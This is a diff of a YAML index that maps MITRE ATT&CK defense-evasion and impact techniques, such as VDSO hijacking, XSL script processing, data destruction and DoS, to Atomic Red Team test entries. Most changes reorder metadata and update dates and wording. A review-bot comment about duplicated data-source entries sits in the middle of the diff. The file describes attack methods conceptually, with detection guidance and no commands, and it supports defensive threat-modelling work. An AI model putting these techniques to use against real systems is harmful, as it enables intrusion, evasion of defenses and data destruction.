+ goes above a certain threshold.(Citation: CloudSploit - Unused AWS Regions)'
atomic_tests: []
T1550:
technique:
@@ -32420,14 +33372,10 @@ defense-evasion:
phase_name: lateral-movement
modified: '2020-03-24T12:36:24.608Z'
created: '2020-01-30T16:18:36.873Z'
- x_mitre_platforms:
- - Windows
- - Office 365
- - SaaS
- x_mitre_data_sources:
- - Office 365 audit logs
- - OAuth audit logs
- - Authentication logs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_defense_bypassed:
+ - System Access Controls
x_mitre_detection: 'Configure robust, consistent account activity audit policies
across the enterprise and with externally accessible services.(Citation: TechNet
Audit Policy) Look for suspicious account behavior across systems that share
@@ -32439,10 +33387,14 @@ defense-evasion:
account. Correlate other security systems with login information (e.g., a
user has an active login session but has not entered the building or does
not have VPN access).'
- x_mitre_defense_bypassed:
- - System Access Controls
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Office 365 audit logs
+ - OAuth audit logs
+ - Authentication logs
+ x_mitre_platforms:
+ - Windows
+ - Office 365
+ - SaaS
atomic_tests: []
T1497.002:
technique:
@@ -32488,17 +33440,17 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-27T14:10:32.872Z'
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
+ modified: '2020-07-01T16:32:02.491Z'
created: '2020-03-06T21:04:12.454Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_contributors:
- - Deloitte Threat Library Team
- x_mitre_data_sources:
- - Process command-line parameters
- - Process use of network
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Static File Analysis
+ - Signature-based detection
+ - Host forensic analysis
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_detection: 'User activity-based checks will likely occur in the first
steps of an operation but may also occur throughout as an adversary learns
the environment. Data and events should not be viewed in isolation, but as
@@ -32509,32 +33461,37 @@ defense-evasion:
processes being spawned that gather a variety of system information or perform
other forms of Discovery, especially in a short period of time, may aid in
detection. '
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_defense_bypassed:
- - Anti-virus
- - Static File Analysis
- - Signature-based detection
- - Host forensic analysis
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process use of network
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1055.014:
technique:
id: attack-pattern--98be40f2-c86b-4ade-b6fc-4964932040e5
description: "Adversaries may inject malicious code into processes via VDSO
hijacking in order to evade process-based defenses as well as possibly elevate
- privileges. Virtual dynamic shared object (VDSO) hijacking is a method of
+ privileges. Virtual dynamic shared object (vdso) hijacking is a method of
executing arbitrary code in the address space of a separate live process.
\n\nVDSO hijacking involves redirecting calls to dynamically linked shared
- libraries mapped into all user-land processes by the kernel. An adversary
- may patch memory address references stored in a process' global offset table
- (which store absolute addresses of functions) to inject malicious code into
- a running process. This code can then be invoked by redirecting the execution
- flow of the process (ex: using custom shellcode or hijacked system calls).
- (Citation: ELF Injection May 2009) \n\nRunning code in the context of another
- process may allow access to the process's memory, system/network resources,
- and possibly elevated privileges. Execution via VDSO hijacking may also evade
- detection from security products since the execution is masked under a legitimate
- process. "
+ libraries. Memory protections may prevent writing executable code to a process
+ via [Ptrace System Calls](https://attack.mitre.org/techniques/T1055/008).
+ However, an adversary may hijack the syscall interface code stubs mapped into
+ a process from the vdso shared object to execute syscalls to open and map
+ a malicious shared object. This code can then be invoked by redirecting the
+ execution flow of the process via patched memory address references stored
+ in a process' global offset table (which store absolute addresses of mapped
+ library functions).(Citation: ELF Injection May 2009) (Citation: Backtrace
+ VDSO) (Citation: VDSO Aug 2005) (Citation: Syscall 2014)\n\nRunning code in
+ the context of another process may allow access to the process's memory, system/network
+ resources, and possibly elevated privileges. Execution via VDSO hijacking
+ may also evade detection from security products since the execution is masked
+ under a legitimate process. "
name: VDSO Hijacking
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
object_marking_refs:
@@ -32547,6 +33504,18 @@ defense-evasion:
url: https://web.archive.org/web/20150711051625/http://vxer.org/lib/vrn00.html
description: O'Neill, R. (2009, May). Modern Day ELF Runtime infection via
GOT poisoning. Retrieved March 15, 2020.
+ - source_name: Backtrace VDSO
+ url: https://backtrace.io/blog/backtrace/elf-shared-library-injection-forensics/
+ description: backtrace. (2016, April 22). ELF SHARED LIBRARY INJECTION FORENSICS.
+ Retrieved June 15, 2020.
+ - source_name: VDSO Aug 2005
+ url: https://web.archive.org/web/20051013084246/http://www.trilithium.com/johan/2005/08/linux-gate/
+ description: Petersson, J. (2005, August 14). What is linux-gate.so.1?. Retrieved
+ June 16, 2020.
+ - source_name: Syscall 2014
+ url: https://lwn.net/Articles/604515/
+ description: Drysdale, D. (2014, July 16). Anatomy of a system call, part
+ 2. Retrieved June 16, 2020.
- description: 'Ligh, M.H. et al.. (2014, July). The Art of Memory Forensics:
Detecting Malware and Threats in Windows, Linux, and Mac Memory. Retrieved
December 20, 2017.'
@@ -32555,7 +33524,7 @@ defense-evasion:
description: GNU. (2010, February 5). The GNU Accounting Utilities. Retrieved
December 20, 2017.
source_name: GNU Acct
- - url: https://access.redhat.com/documentation/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing
+ - url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing
description: Jahoda, M. et al.. (2017, March 14). redhat Security Guide -
Chapter 7 - System Auditing. Retrieved December 20, 2017.
source_name: RHEL auditd
@@ -32569,16 +33538,11 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-26T20:58:10.186Z'
+ modified: '2020-06-20T22:28:45.232Z'
created: '2020-01-14T01:35:00.781Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_data_sources:
- - System calls
- - Process monitoring
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Application control
x_mitre_detection: "Monitor for malicious usage of system calls, such as ptrace
and mmap, that can be used to attach to, manipulate memory, then redirect
a processes' execution path. Monitoring for Linux specific calls such as the
@@ -32589,9 +33553,13 @@ defense-evasion:
\n\nAnalyze process behavior to determine if a process is performing actions
it usually does not, such as opening network connections, reading files, or
other suspicious actions that could relate to post-compromise behavior. "
- x_mitre_defense_bypassed:
- - Anti-virus
- - Process whitelisting
+ x_mitre_data_sources:
+ - System calls
+ - Process monitoring
+ x_mitre_platforms:
+ - Linux
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
atomic_tests: []
T1078:
technique:
@@ -32629,31 +33597,13 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- modified: '2020-03-23T21:59:36.955Z'
+ modified: '2020-06-20T22:44:36.043Z'
created: '2017-05-31T21:31:00.645Z'
- x_mitre_version: '2.1'
- x_mitre_data_sources:
- - AWS CloudTrail logs
- - Stackdriver logs
- - Authentication logs
- - Process monitoring
- x_mitre_defense_bypassed:
- - Firewall
- - Host intrusion prevention systems
- - Network intrusion detection system
- - Process whitelisting
- - System access controls
- - Anti-virus
- x_mitre_detection: |-
- Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
-
- Perform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_effective_permissions:
- - User
- - Administrator
+ x_mitre_is_subtechnique: false
+ x_mitre_contributors:
+ - Netskope
+ - Mark Wee
+ - Praetorian
x_mitre_platforms:
- Linux
- macOS
@@ -32664,11 +33614,29 @@ defense-evasion:
- SaaS
- Office 365
- Azure AD
- x_mitre_contributors:
- - Netskope
- - Mark Wee
- - Praetorian
- x_mitre_is_subtechnique: false
+ x_mitre_effective_permissions:
+ - User
+ - Administrator
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_detection: |-
+ Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+
+ Perform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.
+ x_mitre_defense_bypassed:
+ - Firewall
+ - Host intrusion prevention systems
+ - Network intrusion detection system
+ - Application control
+ - System access controls
+ - Anti-virus
+ x_mitre_data_sources:
+ - AWS CloudTrail logs
+ - Stackdriver logs
+ - Authentication logs
+ - Process monitoring
+ x_mitre_version: '2.1'
atomic_tests: []
T1497:
technique:
@@ -32706,24 +33674,11 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-27T14:20:15.523Z'
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
+ modified: '2020-07-01T16:32:02.272Z'
created: '2019-04-17T22:22:24.505Z'
- x_mitre_is_subtechnique: false
- x_mitre_defense_bypassed:
- - Anti-virus
- - Host forensic analysis
- - Signature-based detection
- - Static File Analysis
- x_mitre_contributors:
- - Deloitte Threat Library Team
- - Sunny Neo
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_data_sources:
- - Process monitoring
- - Process command-line parameters
+ x_mitre_version: '1.2'
x_mitre_detection: Virtualization, sandbox, user activity, and related discovery
techniques will likely occur in the first steps of an operation but may also
occur throughout as an adversary learns the environment. Data and events should
@@ -32734,7 +33689,22 @@ defense-evasion:
required. Monitoring for suspicious processes being spawned that gather a
variety of system information or perform other forms of Discovery, especially
in a short period of time, may aid in detection.
- x_mitre_version: '1.2'
+ x_mitre_data_sources:
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ - Sunny Neo
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Host forensic analysis
+ - Signature-based detection
+ - Static File Analysis
+ x_mitre_is_subtechnique: false
atomic_tests: []
T1550.004:
technique:
@@ -32769,21 +33739,21 @@ defense-evasion:
phase_name: lateral-movement
modified: '2020-03-24T12:36:24.501Z'
created: '2020-01-30T17:48:49.395Z'
- x_mitre_platforms:
- - Office 365
- - SaaS
- x_mitre_contributors:
- - Johann Rehberger
- x_mitre_data_sources:
- - Office 365 audit logs
- - Authentication logs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_defense_bypassed:
+ - System Access Controls
x_mitre_detection: Monitor for anomalous access of websites and cloud-based
applications by the same user in different locations or by different systems
that do not match expected configurations.
- x_mitre_defense_bypassed:
- - System Access Controls
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Office 365 audit logs
+ - Authentication logs
+ x_mitre_contributors:
+ - Johann Rehberger
+ x_mitre_platforms:
+ - Office 365
+ - SaaS
atomic_tests: []
T1222.001:
technique:
@@ -32828,23 +33798,23 @@ defense-evasion:
phase_name: defense-evasion
modified: '2020-03-29T23:07:55.953Z'
created: '2020-02-04T19:17:41.767Z'
- x_mitre_platforms:
- - Windows
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ - SYSTEM
+ x_mitre_detection: |-
+ Monitor and investigate attempts to modify DACLs and file/directory ownership. Many of the commands used to modify DACLs and file/directory ownership are built-in system utilities and may generate a high false positive alert rate, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.
+
+ Consider enabling file/directory permission change auditing on folders containing key binary/configuration files. For example, Windows Security Log events (Event ID 4670) are created when DACLs are modified.(Citation: EventTracker File Permissions Feb 2014)
x_mitre_data_sources:
- Windows event logs
- Process command-line parameters
- Process monitoring
- File monitoring
- x_mitre_detection: |-
- Monitor and investigate attempts to modify DACLs and file/directory ownership. Many of the commands used to modify DACLs and file/directory ownership are built-in system utilities and may generate a high false positive alert rate, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.
-
- Consider enabling file/directory permission change auditing on folders containing key binary/configuration files. For example, Windows Security Log events (Event ID 4670) are created when DACLs are modified.(Citation: EventTracker File Permissions Feb 2014)
- x_mitre_permissions_required:
- - User
- - Administrator
- - SYSTEM
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_platforms:
+ - Windows
identifier: T1222.001
atomic_tests:
- name: Take ownership using takeown utility
@@ -32935,9 +33905,9 @@ defense-evasion:
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: XSL Script Processing
description: |-
- Adversaries may bypass application whitelisting and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017)
+ Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017)
- Adversaries may abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses. Similar to [Trusted Developer Utilities Proxy Execution](https://attack.mitre.org/techniques/T1127), the Microsoft common line transformation utility binary (msxsl.exe) (Citation: Microsoft msxsl.exe) can be installed and used to execute malicious JavaScript embedded within local or remote (URL referenced) XSL files. (Citation: Penetration Testing Lab MSXSL July 2017) Since msxsl.exe is not installed by default, an adversary will likely need to package it with dropped files. (Citation: Reaqta MSXSL Spearphishing MAR 2018) Msxsl.exe takes two main arguments, an XML source file and an XSL stylesheet. Since the XSL file is valid XML, the adversary may call the same XSL file twice. When using msxsl.exe adversaries may also give the XML/XSL files an arbitrary file extension.(Citation: XSL Bypass Mar 2019)
+ Adversaries may abuse this functionality to execute arbitrary files while potentially bypassing application control. Similar to [Trusted Developer Utilities Proxy Execution](https://attack.mitre.org/techniques/T1127), the Microsoft common line transformation utility binary (msxsl.exe) (Citation: Microsoft msxsl.exe) can be installed and used to execute malicious JavaScript embedded within local or remote (URL referenced) XSL files. (Citation: Penetration Testing Lab MSXSL July 2017) Since msxsl.exe is not installed by default, an adversary will likely need to package it with dropped files. (Citation: Reaqta MSXSL Spearphishing MAR 2018) Msxsl.exe takes two main arguments, an XML source file and an XSL stylesheet. Since the XSL file is valid XML, the adversary may call the same XSL file twice. When using msxsl.exe adversaries may also give the XML/XSL files an arbitrary file extension.(Citation: XSL Bypass Mar 2019)
Command-line examples:(Citation: Penetration Testing Lab MSXSL July 2017)(Citation: XSL Bypass Mar 2019)
@@ -32988,33 +33958,33 @@ defense-evasion:
kill_chain_phases:
- phase_name: defense-evasion
kill_chain_name: mitre-attack
- modified: '2020-02-05T14:15:23.103Z'
+ modified: '2020-06-20T22:45:46.479Z'
created: '2018-10-17T00:14:20.652Z'
- x_mitre_version: '1.2'
- x_mitre_contributors:
- - Avneet Singh
- - Casey Smith
- - Praetorian
+ x_mitre_is_subtechnique: false
+ x_mitre_system_requirements:
+ - Microsoft Core XML Services (MSXML) or access to wmic.exe
+ x_mitre_platforms:
+ - Windows
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: |-
+ Use process monitoring to monitor the execution and arguments of msxsl.exe and wmic.exe. Compare recent invocations of these utilities with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity (ex: URL command line arguments, creation of external network connections, loading of DLLs associated with scripting). (Citation: LOLBAS Wmic) (Citation: Twitter SquiblyTwo Detection APR 2018) Command arguments used before and after the script invocation may also be useful in determining the origin and purpose of the payload being loaded.
+
+ The presence of msxsl.exe or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Application control
+ - Digital Certificate Validation
x_mitre_data_sources:
- Process monitoring
- Process command-line parameters
- Process use of network
- DLL monitoring
- x_mitre_defense_bypassed:
- - Anti-virus
- - Application whitelisting
- - Digital Certificate Validation
- x_mitre_detection: |-
- Use process monitoring to monitor the execution and arguments of msxsl.exe and wmic.exe. Compare recent invocations of these utilities with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity (ex: URL command line arguments, creation of external network connections, loading of DLLs associated with scripting). (Citation: LOLBAS Wmic) (Citation: Twitter SquiblyTwo Detection APR 2018) Command arguments used before and after the script invocation may also be useful in determining the origin and purpose of the payload being loaded.
-
- The presence of msxsl.exe or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.
- x_mitre_permissions_required:
- - User
- x_mitre_platforms:
- - Windows
- x_mitre_system_requirements:
- - Microsoft Core XML Services (MSXML) or access to wmic.exe
- x_mitre_is_subtechnique: false
+ x_mitre_contributors:
+ - Avneet Singh
+ - Casey Smith
+ - Praetorian
+ x_mitre_version: '1.2'
identifier: T1220
atomic_tests:
- name: MSXSL Bypass using local files
@@ -33157,24 +34127,9 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- modified: '2019-10-14T23:29:24.908Z'
+ modified: '2020-07-14T19:15:29.911Z'
created: '2019-10-09T18:48:31.906Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Windows event logs
- - Process command-line parameters
- - Process monitoring
- x_mitre_permissions_required:
- - User
- - Administrator
- - root
- - SYSTEM
- x_mitre_impact_type:
- - Availability
- x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
x_mitre_detection: |-
Use process monitoring to monitor the execution and command line parameters of binaries involved in deleting accounts or changing passwords, such as use of [Net](https://attack.mitre.org/software/S0039). Windows event logs may also designate activity associated with an adversary's attempt to remove access to an account:
@@ -33184,6 +34139,22 @@ impact:
* Event ID 4740 - A user account was locked out
Alerting on [Net](https://attack.mitre.org/software/S0039) and these Event IDs may generate a high degree of false positives, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.
+ x_mitre_version: '1.0'
+ x_mitre_impact_type:
+ - Availability
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ - root
+ - SYSTEM
+ x_mitre_data_sources:
+ - Windows event logs
+ - Process command-line parameters
+ - Process monitoring
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
identifier: T1531
atomic_tests:
- name: Change User Password - Windows
@@ -33315,6 +34286,21 @@ impact:
phase_name: impact
modified: '2020-03-29T02:01:10.832Z'
created: '2020-02-20T15:35:00.025Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_impact_type:
+ - Availability
+ x_mitre_detection: |-
+ Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
+
+ In addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.
+ x_mitre_data_sources:
+ - Network device logs
+ - Network device logs
+ - Network intrusion detection system
+ - Web application firewall logs
+ - Web logs
+ - SSL/TLS inspection
x_mitre_platforms:
- Linux
- macOS
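Review bot: The new `x_mitre_data_sources` list in this hunk repeats `Network device logs` twice in a row, so a consumer that tallies data-source coverage per technique will double-count it; the same pattern appears later in the T1491 hunk, where `Packet capture` is listed both first and last. Both duplicates are also present on the removed side, so they look carried over from the upstream bundle rather than introduced by this commit, but the generator could deduplicate each list while preserving order, leaving `- Network device logs` once and the remaining four entries unchanged. The enclosing technique mapping continues past the hunk boundary.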
@@ -33325,21 +34311,6 @@ impact:
- Office 365
- Azure AD
- SaaS
- x_mitre_data_sources:
- - Network device logs
- - Network device logs
- - Network intrusion detection system
- - Web application firewall logs
- - Web logs
- - SSL/TLS inspection
- x_mitre_detection: |-
- Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
-
- In addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.
- x_mitre_impact_type:
- - Availability
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
atomic_tests: []
T1499.004:
technique:
@@ -33367,6 +34338,20 @@ impact:
phase_name: impact
modified: '2020-03-29T02:07:27.508Z'
created: '2020-02-20T15:37:27.052Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_impact_type:
+ - Availability
+ x_mitre_detection: Attacks targeting web applications may generate logs in the
+ web server, application server, and/or database server that can be used to
+ identify the type of attack. Externally monitor the availability of services
+ that may be targeted by an Endpoint DoS.
+ x_mitre_data_sources:
+ - Network device logs
+ - Network intrusion detection system
+ - Web application firewall logs
+ - Web logs
+ - SSL/TLS inspection
x_mitre_platforms:
- Linux
- macOS
@@ -33377,20 +34362,6 @@ impact:
- Office 365
- Azure AD
- SaaS
- x_mitre_data_sources:
- - Network device logs
- - Network intrusion detection system
- - Web application firewall logs
- - Web logs
- - SSL/TLS inspection
- x_mitre_detection: Attacks targeting web applications may generate logs in the
- web server, application server, and/or database server that can be used to
- identify the type of attack. Externally monitor the availability of services
- that may be targeted by an Endpoint DoS.
- x_mitre_impact_type:
- - Availability
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
atomic_tests: []
T1485:
technique:
@@ -33439,29 +34410,29 @@ impact:
phase_name: impact
modified: '2020-03-27T21:08:19.783Z'
created: '2019-03-14T18:47:17.701Z'
- x_mitre_impact_type:
- - Availability
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ - root
+ - SYSTEM
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - File monitoring
+ - Process command-line parameters
+ - Process monitoring
x_mitre_detection: Use process monitoring to monitor the execution and command-line
parameters of binaries that could be involved in data destruction activity,
such as [SDelete](https://attack.mitre.org/software/S0195). Monitor for the
creation of suspicious files as well as high unusual file modification activity.
In particular, look for large quantities of file modifications in user directories
and under C:\Windows\System32\.
- x_mitre_data_sources:
- - File monitoring
- - Process command-line parameters
- - Process monitoring
- x_mitre_version: '1.0'
- x_mitre_permissions_required:
- - User
- - Administrator
- - root
- - SYSTEM
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_is_subtechnique: false
+ x_mitre_impact_type:
+ - Availability
identifier: T1485
atomic_tests:
- name: Windows - Overwrite file with Sysinternals SDelete
@@ -33557,28 +34528,28 @@ impact:
phase_name: impact
modified: '2020-03-27T21:09:28.699Z'
created: '2019-03-15T13:59:30.390Z'
- x_mitre_version: '1.0'
- x_mitre_permissions_required:
- - User
- - Administrator
- - root
- - SYSTEM
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_is_subtechnique: false
+ x_mitre_impact_type:
+ - Availability
+ x_mitre_detection: |-
+ Use process monitoring to monitor the execution and command line parameters of of binaries involved in data destruction activity, such as vssadmin, wbadmin, and bcdedit. Monitor for the creation of suspicious files as well as unusual file modification activity. In particular, look for large quantities of file modifications in user directories.
+
+ In some cases, monitoring for unusual kernel driver installation activity can aid in detection.
x_mitre_data_sources:
- Kernel drivers
- File monitoring
- Process command-line parameters
- Process monitoring
- x_mitre_detection: |-
- Use process monitoring to monitor the execution and command line parameters of of binaries involved in data destruction activity, such as vssadmin, wbadmin, and bcdedit. Monitor for the creation of suspicious files as well as unusual file modification activity. In particular, look for large quantities of file modifications in user directories.
-
- In some cases, monitoring for unusual kernel driver installation activity can aid in detection.
- x_mitre_impact_type:
- - Availability
- x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ - root
+ - SYSTEM
+ x_mitre_version: '1.0'
atomic_tests: []
T1565:
technique:
@@ -33601,28 +34572,28 @@ impact:
phase_name: impact
modified: '2020-03-28T23:16:20.202Z'
created: '2020-03-02T14:19:22.609Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Packet capture
- - Network protocol analysis
- - File monitoring
- - Application logs
- x_mitre_detection: Where applicable, inspect important file hashes, locations,
- and modifications for suspicious/unexpected values. With some critical processes
- involving transmission of data, manual or out-of-band integrity checking may
- be useful for identifying manipulated data.
- x_mitre_impact_type:
- - Integrity
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
x_mitre_permissions_required:
- User
- Administrator
- root
- SYSTEM
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
+ x_mitre_impact_type:
+ - Integrity
+ x_mitre_detection: Where applicable, inspect important file hashes, locations,
+ and modifications for suspicious/unexpected values. With some critical processes
+ involving transmission of data, manual or out-of-band integrity checking may
+ be useful for identifying manipulated data.
+ x_mitre_data_sources:
+ - Packet capture
+ - Network protocol analysis
+ - File monitoring
+ - Application logs
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1491:
technique:
@@ -33645,20 +34616,10 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- modified: '2020-03-29T22:57:05.545Z'
+ modified: '2020-04-22T15:19:31.682Z'
created: '2019-04-08T17:51:41.390Z'
- x_mitre_data_sources:
- - Packet capture
- - Web application firewall logs
- - Web logs
- - Packet capture
- x_mitre_detection: "Monitor internal and external websites for unplanned content
- changes. Monitor application logs for abnormal behavior that may indicate
- attempted or successful exploitation. Use deep packet inspection to look for
- artifacts of common exploit traffic, such as SQL injection. Web Application
- Firewalls may detect improper inputs attempting exploitation.\n\n"
- x_mitre_impact_type:
- - Integrity
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '1.1'
x_mitre_platforms:
- Linux
- macOS
@@ -33666,8 +34627,18 @@ impact:
- AWS
- GCP
- Azure
- x_mitre_version: '1.1'
- x_mitre_is_subtechnique: false
+ x_mitre_impact_type:
+ - Integrity
+ x_mitre_detection: "Monitor internal and external websites for unplanned content
+ changes. Monitor application logs for abnormal behavior that may indicate
+ attempted or successful exploitation. Use deep packet inspection to look for
+ artifacts of common exploit traffic, such as SQL injection. Web Application
+ Firewalls may detect improper inputs attempting exploitation.\n\n"
+ x_mitre_data_sources:
+ - Packet capture
+ - Web application firewall logs
+ - Web logs
+ - Packet capture
atomic_tests: []
T1498.001:
technique:
@@ -33698,20 +34669,12 @@ impact:
phase_name: impact
modified: '2020-03-29T01:10:52.360Z'
created: '2020-03-02T20:07:18.651Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- - AWS
- - GCP
- - Azure AD
- - SaaS
- - Azure
- - Office 365
- x_mitre_impact_type:
- - Availability
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Sensor health and status
+ - Network protocol analysis
+ - Netflow/Enclave netflow
+ - Network intrusion detection system
+ - Network device logs
x_mitre_detection: 'Detection of a network flood can sometimes be achieved before
the traffic volume is sufficient to cause impact to the availability of the
service, but such response time typically requires very aggressive monitoring
@@ -33724,15 +34687,40 @@ impact:
time may be small and the indicator of an event availability of the network
or service drops. The analysis tools mentioned can then be used to determine
the type of DoS causing the outage and help with remediation.'
- x_mitre_data_sources:
- - Sensor health and status
- - Network protocol analysis
- - Netflow/Enclave netflow
- - Network intrusion detection system
- - Network device logs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_impact_type:
+ - Availability
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ - AWS
+ - GCP
+ - Azure AD
+ - SaaS
+ - Azure
+ - Office 365
atomic_tests: []
T1561.001:
technique:
+ created: '2020-02-20T22:06:41.739Z'
+ modified: '2020-03-28T22:53:20.162Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ type: attack-pattern
+ id: attack-pattern--fb640c43-aa6b-431e-a961-a279010424ac
+ description: |-
+ Adversaries may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources.
+
